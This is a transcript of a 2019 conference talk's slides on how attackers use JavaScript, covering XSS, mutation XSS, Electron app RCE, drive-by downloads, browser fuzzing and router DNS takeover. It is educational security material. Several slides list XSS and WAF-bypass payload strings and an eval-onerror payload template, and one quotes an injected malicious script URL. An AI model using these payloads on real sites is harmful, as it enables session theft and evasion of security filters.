Captain Marvellous JavaScript - JSFoo Coimbatore 2019

Transcript

1. CAPTAIN MARVELLOUS JAVASCRIPT A L O O K AT T

   H E V E R S AT I L I T Y O F J S A N D H OW H A C K E R S U S E I T

2. ABOUT ME? • Riyaz Walikar, Chief Hacker @Appsecco • Several

   years of security experience in breaking things (Offensive Security) • All kinds of things (applications/mobile/systems/networks/wireless/cloud) • Love to travel, do photography and stargaze • Comic nerd Appsecco – https://appsecco.com @appseccouk

3. WHAT IS THIS TALK ABOUT? • The versatility of JS

   and its application in unorthodox circumstances and in offensive use cases. • JavaScript is everywhere. As much as it is used to build stuff, several use cases exist where hackers use JS to break stuff as well. • We will look at examples from Computer Security where JS is used to detect vulnerabilities, build payloads, reliably exploit software, infra and humans alike. • This talk is meant to introduce the audience to the various applications of JS (or its variations) from an attacker point of view and provide real world examples while doing so Appsecco – https://appsecco.com @appseccouk

4. JAVASCRIPT AND XSS: IS THAT IT? I C O N

   F I R M E D W H E N YO U P R O M P T E D F O R A N A L E RT

5. IS THIS ALL THERE IS TO XSS? Appsecco – https://appsecco.com

   @appseccouk

6. WE ALL KNOW • XSS occurs when user controlled data

   is reflected back in the browser as-is and is then processed by the browser’s JS engine • This user controlled data when run in the browser’s JS engine will have the same capabilities as developer written JS Appsecco – https://appsecco.com @appseccouk

7. WHAT XSS IS CAPABLE OF @appseccouk How most developers see

   XSS How most attackers see XSS https://www.polygon.com/2017/5/17/15624888/guardians-of-the-galaxy-vol-2-mantis-wrong https://www.looper.com/63592/untold-truth-baby-groot/

8. WHAT CAN YOU DO WITH XSS? • XSS can be

   used to (not an exhaustive list) – Read and send session data elsewhere – Read secrets in the DOM – Redirect users to malware infested sites / pornographic content – Steal the system CPU time to mine bitcoins – Steal keyboard keys (credentials) – Browser exploitation and Remote Code Execution – Phishing attacks / Framing content – Hack into internal routers and update the DNS or gateway IP to steal all network traffic Appsecco – https://appsecco.com @appseccouk

9. I'VE GOT NO BEEF WITH YOU! • Automated Tool to

   work with XSS infected zombies (browsers) • Features of BeEF (Browser Exploitation Framework) – Browser and OS fingerprinting – User behavior fingerprinting and Social Engineering – Fake Flash Update to install rogue extension – Identify internal IP address – Port scanner, network map creation – Run Metasploit modules to perform exploitation – Tunnel traffic through the browser – Geolocation of the browser Appsecco – https://appsecco.com @appseccouk
10. None
11. None

12. DEMO: BEEF IN ACTION Appsecco – https://appsecco.com @appseccouk

13. MUTATION XSS N OT C A N C E R

    O U S B U T M O R E L I K E J E A N G R E Y

14. MUTATION WHAT? • First described by Mario Heiderich in 2013,

    is a technique that relies on Browser engines to mutate strings when placed inside an innerHTML context. • The earliest known example was by a researcher called Yosuke Hasegawa in IE’s innerHTML in 2007 • He noticed that in IE, an element’s attribute bled into the document when using Print Preview when the attribute contained backticks Appsecco – https://appsecco.com @appseccouk

15. • IN <img src="foo" alt="``onerror=alert(1)"/> • OUT <img alt=``onerror=alert(1) src="foo">

    Appsecco – https://appsecco.com @appseccouk https://tenor.com/view/what-thor-confused-chris-hemsworth-gif-13355644

16. MUTATION WHAT? • Basically, user controlled input is innocuous as

    it passes through server filters, client filters, WAF, browser protections etc. but is made malicious by the browser when injected into innerHTML • Over the years, multiple vectors have been discovered that can be used to trick browsers into rendering malicious content while passing through filters and protections as harmless strings Appsecco – https://appsecco.com @appseccouk

17. CS: THE GOOGLE XSS • Most attackers dream of getting

    an XSS on the Google home page via the search bar Appsecco – https://appsecco.com @appseccouk

18. CS: THE GOOGLE XSS BACKGROUND • On Sept 26 2018,

    a developer working on the Closure library created a commit that removed part of input sanitisation. The Google Search bar uses the Closure library • In Feb 2019, Masato Kinugawa discovered that this allowed a mutation to occur when a noscript tag was used with malformed HTML. The closure library would parse the input via template element and render it via div innerHTML • To understand this better, let’s take a look at how browsers mutate broken HTML Appsecco – https://appsecco.com @appseccouk

19. CS: THE GOOGLE XSS BROWSER MUTATIONS • Save this as

    a.html <div><script title="</div>"> • Save this as b.html <script><div title="</script>"> • Open both in Chrome and view the console for rendered source Appsecco – https://appsecco.com @appseccouk

20. CS: THE GOOGLE XSS BROWSER MUTATIONS <div><script title="</div>"> <script><div title="</script>">

    Appsecco – https://appsecco.com @appseccouk

21. CS: THE GOOGLE XSS THE NOSCRIPT TAG MUTATION • Closure

    library utilised the template tag to obtain safe HTML to be then passed to a div • The `template` element does not parse JS but a `div` does • If we pass a `<noscript>` tag containing a broken noscript tag and an xss vector, the noscript tag would be parsed by `template` and then `div` causing the xss to trigger Appsecco – https://appsecco.com @appseccouk

22. Appsecco – https://appsecco.com @appseccouk

23. SERVER SIDE JS ATTACKS L E T ’ S G

    I V E J S F U L L A C C E S S TO S E RV E R R E S O U R C E S , S A I D N O O N E E V E R

24. “User supplied data should never be used inside an execution

    context without first checking if the data has any special meaning within that context” Appsecco – https://appsecco.com @appseccouk - Every programming language ever https://www.businessinsider.in/The-best-part-of-the-Captain-Marvel-trailer-has-now-become-a-hilarious-meme/articleshow/65875962.cms

25. THE PERILS OF SERVER SIDE USER CODE • Where is

    the data coming from? • Where will the data be processed? • Will the function processing the data validate if the data is benign within it’s context? • Server side processing has access to the OS and its resources • User supplied data may be able to traverse server side objects and reach functions that would otherwise remain hidden/protected Appsecco – https://appsecco.com @appseccouk

26. SERVER SIDE JS INJECTION SPOT THE BUG Appsecco – https://appsecco.com

    @appseccouk A Server Side JavaScript Injection occurs when user input is passed to a server function that performs a JS eval. This could be done through multiple JS functions like eval(), setTimeout(), setInterval() and Function()

27. DEMO: REMOTE CODE EXECUTION • Crudely written webservice (remember I’m

    not a dev ☺) • Try it out from here - https://github.com/appsecco/vulnerable- apps/tree/master/node-simple-rce • Has multiple routes that perform multiple functions • Written in nodejs (express) with MongoDB backend • Quick test cases to check if user input ends up in eval context – Math: 5-4 – JS objects: undefined, String – Response objects: res, resp, response, rs • Then load other modules using require and use res.send to receive Appsecco – https://appsecco.com @appseccouk

28. JS AND DESKTOP APPLICATIONS

29. MIXING DESKTOP CLIENTS AND JAVASCRIPT (WCGW) • JavaScript is now

    on the Desktop via Electron • Electron = Chromium front-end + NodeJS backend = Pseudo Native Platform Agnostic App • A lot of commonly used applications have now been ported to Electron • So from an attacker point of view – You have an app running on your desktop – To which I can send input (via a message, network traffic, hosted content, shared file or any feature) – The app uses JS to parse user provided input – WCGW Appsecco – https://appsecco.com @appseccouk

30. SOME ELECTRON APPS • Visual Studio Code (FTW) • Slack

    • Skype • LosslessCut • Waiterio Restaurant POS • Microsoft Teams • Snipline • Windows 95 Appsecco – https://appsecco.com @appseccouk

31. Appsecco – https://appsecco.com @appseccouk https://github.com/felixrieseberg/windows95

32. CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP •

    AttackSurfaceAnalyzer (ASA) is a tool that takes a snapshot of your system state before and after the installation of other software product(s) and displays changes to a number of key elements of the system attack surface • ASA uses Electron.NET which is a wrapper around a "normal" Electron application with an embedded ASP.NET Core application. Electron APIs are invoked using a Electron.NET IPC bridge from .NET • An RCE was discovered in ASA due to the infamous NodeIntegration flag being set to true • This allows a JavaScript payload to spawn up processes on the target Appsecco – https://appsecco.com @appseccouk

33. CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP WHAT

    WAS THE ISSUE AND THE EXPLOIT? • NodeIntegration flag was set to true in WebPreferences.cs • Allows calling of other modules like process_wrap or child_process • An XSS can result in server side code execution Appsecco – https://appsecco.com @appseccouk

34. CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP TRIGGERING

    THE PAYLOAD AND CODE EXEC • Using an encoder to convert to either base64 or charCode, the entire payload can be passed via an onerror trigger • <img src=x onerror=eval(encoded_payload)> Appsecco – https://appsecco.com @appseccouk
35. None

36. CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET •

    Electron was vulnerable to a Protocol Handler Vulnerability, affecting apps that use custom protocol handlers. • Assigned CVE-2018-1000006 • Basically, Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, are vulnerable • A ton of apps became vulnerable due to the way the protocol handler could be used to pass additional parameters to the chromium window running the app • Example of this bug in Exodus, a cryptocurrency wallet handler. Appsecco – https://appsecco.com @appseccouk

37. CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET THE

    BUG • Exodus registers a protocol handler, exodus://, which when invoked would launch the app • Browsing to a page containing the following code would result in Exodus launching with the command line args provided @appseccouk Appsecco – https://appsecco.com

38. CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET THE

    EXPLOIT • Using the list at https://peter.sh/experiments/chromium-command-line- switches/, a command line switch was identified that would allow custom program to be launched @appseccouk Appsecco – https://appsecco.com

39. CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER • A

    Quoted reply on Signal led to evaluation of HTML content • Signal internally uses React to render UI elements in the Chromium window • Issue in how the renderText() function in Quote.tsx set the HTML in the window Appsecco – https://appsecco.com @appseccouk

40. CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER THE EXPLOIT

    • As the exploit relies on the user quoting a message containing valid HTML, an attacker could send messages containing HTML elements rendered as literals • When this is quoted in a reply, the HTML could be made to become part of the window and an innerHTML could cause execution • No public PoC released, however a message such as follows would work in this context Appsecco – https://appsecco.com @appseccouk

41. BREAKING FILTERS AND WAFS? W H Y B L A

    C K L I S T S D O N ’ T M AT T E R

42. COMMON BYPASSES • JS objects, variables and functions can be

    represented in many forms • If the PoC is to generate an alert box, several different forms of calling the alert work • Depending on the filter being targeted, you need to analyse the output that is received for various mutations of the input • Primarily, the following forms of manipulations can be tried – Representing an object differently – Using encoding techniques – String and object manipulation to access functions and attributes – Relying on browser and JS engine implementations to transform innocuous objects Appsecco – https://appsecco.com @appseccouk

43. COMMON BYPASSES • Some of the more common representations and

    usage include the following cases – alert(/xss/) – eval("ale"+"rt(0)") – Function("aler"+"t(0)")() – onerror="alert;throw 1" – onerror=eval;throw'=confirm\x281\x29'; – javascript:\u0061lert&#x28;1&#x29 – <input onfocus=alert(document.cookie) autofocus> – eval(17795081..toString(36)+"(0)") – " onmouonmouseoverseover=alalertert(0) – self['\x61\x6c\x65\x72\x74']('\x58\x53\x53') Appsecco – https://appsecco.com @appseccouk

44. JS WEIRDNESS (FOR ATTACKERS) • JS can get real weird

    real quick for attackers and different representations can be used as attack payloads • It’s perfectly legal JS, but due to the representation itself it appears weird™ • Using an obscure form of JS representation called JsFuck, you can create objects, strings and other entities ready for execution without using strings or numbers • It uses only six different characters to write and execute code - ()+[]! Appsecco – https://appsecco.com @appseccouk

45. JS WEIRDNESS Appsecco – https://appsecco.com @appseccouk

46. JS WEIRDNESS Appsecco – https://appsecco.com @appseccouk

47. Appsecco – https://appsecco.com @appseccouk

48. BREAKING FILTERS/WAFS • Depending on the context where reflection is

    occurring, different forms of input can be tried • For dynamic filters that strip away blacklisted words like onmouseover, onload etc. the following test cases can be applied – " onmouonmouseoverseover=alalertert(0 – <svg/onloloadad="al+"ert(0)"> – " ontouch=alert(0) • Some filters may not detect payloads sent using newline or whitespace characters – " name=test%0d%0a<script>alert(0)</script> • If the WAF/filter allows Unicode representation to pass through, you could use something like – xss\"\u003E\u003Ch1 onmous\u0045over=al\u0065r\u0074(domain)\u003EPayload\u003C/h1\u003E Appsecco – https://appsecco.com @appseccouk

49. MALWARE, JAVASCRIPT AND OBFUSCATION YO U W I L L

    N OT B E L I E V E W H AT H A P P E N E D N E X T

50. MALWARE AND THE INTERNET • Almost all modern malware infections,

    social engineering attempts, phishing and targeted ad campaigns are now delivered through the Internet • Attackers compromise high traffic website, inject malicious JavaScript as part of the page or add an iframe that redirects the user to a phishing site or simply prompts to download and run “antivirus software” • The compromise may have been done using a Stored XSS, a weak admin password, server side code execution vulnerability or due to the usage of a vulnerable library hosted on a CDN • Attackers also heavily rely on user’s browsing habits, clickbaity articles and user belief in phishing emails to achieve what is known as a “drive by download” attack Appsecco – https://appsecco.com @appseccouk

51. GETTING A USER TO NAVIGATE Appsecco – https://appsecco.com @appseccouk https://www.thedailystar.net/shout/the-internet/news/five-stages-dealing-clickbait-1734130

52. CS: DRIVE BY DOWNLOADS https://www.reddit.com/r/MovieDetails/comments/87xkts/at_the_end_of_avengers_age_of_ultron_tony_stark/

53. None
54. None

55. CS: DRIVE BY DOWNLOADS THE ATTACK CHAIN • User’s are

    tricked into navigating to a site laden with JS that profiles the browser, addons, the OS and other plugins that may be active (think Flash, Java, Silverlight (?)) • A legitimate site may also be affected with malicious JavaScript via a server side vulnerability or a compromised CDN • A weakness in the browser or third party components is exploited to download/run additional code without user interaction • The user may additionally/alternatively be phished to download and run a binary irrespective of a browser weakness • The binary when run natively on the machine, gives complete access to the attacker, allowing them to manage the machine remotely or add them to a larger bot network Appsecco – https://appsecco.com @appseccouk

56. CS: DRIVE BY DOWNLOADS AN EXAMPLE EXPLOIT – AOL SUPERBUDDY

    EXPLOIT • A legit site was infected with malicious JS via SQL Injection. The HTML code <script src="http://www.kjwd.ru/js.js"> was injected in all pages on the site • The script checks for a cookie to verify if the browser has been attacked before. If no cookie is found, a new cookie is set to mark the beginning of an exploit attempt • A new iframe is created using JS with 0 dimensions. This iframe loads another script from iroe.ru by using the User-Agent request-header field to detect the user’s browser and Operating System • Returned script uses obfuscation techniques and polymorphism to make analysis difficult • Uses location.href as a key to decode encoded strings which makes static analysis difficult Appsecco – https://appsecco.com @appseccouk

57. CS: DRIVE BY DOWNLOADS AN EXAMPLE EXPLOIT CONTD. • A

    sample of the partially deobfuscated code is shown below Appsecco – https://appsecco.com @appseccouk • The script attempts to execute 3 exploits in the if loop, targeting different vulnerabilities • Code creates an ActiveXObject from the AOL SuperBuddy plugin, if successful it executes Exhne69P • The function loads shellcode onto the browser’s heap through various string manipulations so that if the exploit is triggered, the execution will land in the loaded shellcode (heap-spray method) • Actual exploit is triggered by invoking the LinkSBIcons method with a large integer causing an overflow

58. USING JAVASCRIPT TO FUZZ BROWSERS N OW YO U S

    E E M E , N OW YO U D O N ’ T

59. BROWSER FUZZING? Appsecco – https://appsecco.com @appseccouk Create HTML pages containing

    JavaScript that creates and destroys and attempts to re- use destroyed elements from the DOM (example). Create several hundred/thousand mutations of these files as input to different browsers Attempt to load them in a browser attached to a debugger to monitor memory access and system usage Browser crash could mean access to a memory location or control of code flow due to the input HTML+JS page May potentially lead to an info leak or remote code execution or a vulnerability that could be further exploited Many different automated engines/tools available to fuzz browsers. Most of them being open source.

60. TOOLS, BROWSER CRASHES AND THE $$$ • Several popular tools

    like Domato, Grinder attempt to make Browser Fuzzing easier for even novices • Many researchers have written their own tools, scripts, debuggers and other automation around fuzzing browsers • Browser fuzzing and exploitation is a lucrative industry • Several companies buy exploits from researchers including browser vendors themselves • Events like Pwn2Own and other conferences provide cash prizes upwards of 40,000 USD to hackers who successfully hack major browsers • Browser vendors run Bug Bounty programs to safely patch vulnerabilities while paying researchers for their work and working exploits Appsecco – https://appsecco.com @appseccouk
61. None
62. None

63. ATTACKING NET WORK DEVICES USING JAVASCRIPT A D M I

    N A D M I N A N D F U N T H I N G S

64. TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO

    • A user browses to a website using a browser like Chrome or Firefox • The browser loads a piece of JavaScript that uses WebRTC to compute the internal IP address of the machine • This IP is passed to another function that uses it to create the presumed Gateway address and load an image • The image load URL has the default credentials passed via the URL resulting Basic Auth to go through • On successful load of the image, additional functions are called to set the internal DNS of the router and to make the admin console public Appsecco – https://appsecco.com @appseccouk

65. TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET

    • A simple HTML Page example Appsecco – https://appsecco.com @appseccouk

66. TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET

    • The bodyOnLoad function to retrieve the internal IP using WebRTC Appsecco – https://appsecco.com @appseccouk

67. TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO

    • The bodyOnLoad function to retrieve the internal IP using WebRTC Appsecco – https://appsecco.com @appseccouk

68. WHAT COULD GO WRONG FROM HERE • Active and Passive

    Man-in-the-Middle attacks • Phishing attacks to steal credentials by loading attacker controlled domains • Botched program updates received from malicious domains allow direct compromise of the victim system(s) • Attacker has essentially full visibility and control of the target network Appsecco – https://appsecco.com @appseccouk

69. CLOSING NOTES

70. TO CLOSE • JS is not only used to build

    stuff but actively used by attackers to do all sorts of cool things • Do not trust user input, anytime, anywhere • Patch your browsers, update your apps • Change default credentials, everywhere • Be wary of the sites you visit, the links you click and the attachments you open • There is no Nigerian prince who wants to give you money

71. Q & A

72. REFERENCES • https://github.com/beefproject/beef/wiki • https://cure53.de/fp170.pdf • https://www.youtube.com/watch?v=lG7U3fuNw3A • https://github.com/appsecco/dvna •

    https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/#vuln-3-xss-to-rce-via- nodeintegration • https://hackernoon.com/exploiting-electron-rce-in-exodus-wallet-d9e6db13c374 • https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted- replies/ • https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md • https://gist.github.com/xsscx/0e55b25f6b959bf572a9 • https://support.google.com/webmasters/answer/3024344?hl=en • https://sites.cs.ucsb.edu/~vigna/publications/2010_cova_kruegel_vigna_Wepawet.pdf • https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html • https://github.com/Escapingbug/awesome-browser-exploit • https://www.pentestpartners.com/security-blog/lan-surfing-how-to-use-javascript-to-execute-arbitrary-code-on-routers/ • https://www.spamfighter.com/News-20220-Malware-Based-on-JavaScript-Attacks-DNS-Settings-of-Your-Router.htm • https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-devices-used-to-execute-dns-malware-against-home- routers/

73. THANK YOU! • Riyaz AhemedWalikar • @riyazwalikar • @appseccouk •

    https://blog.appsecco.com • https://appsecco.com • https://ibreak.software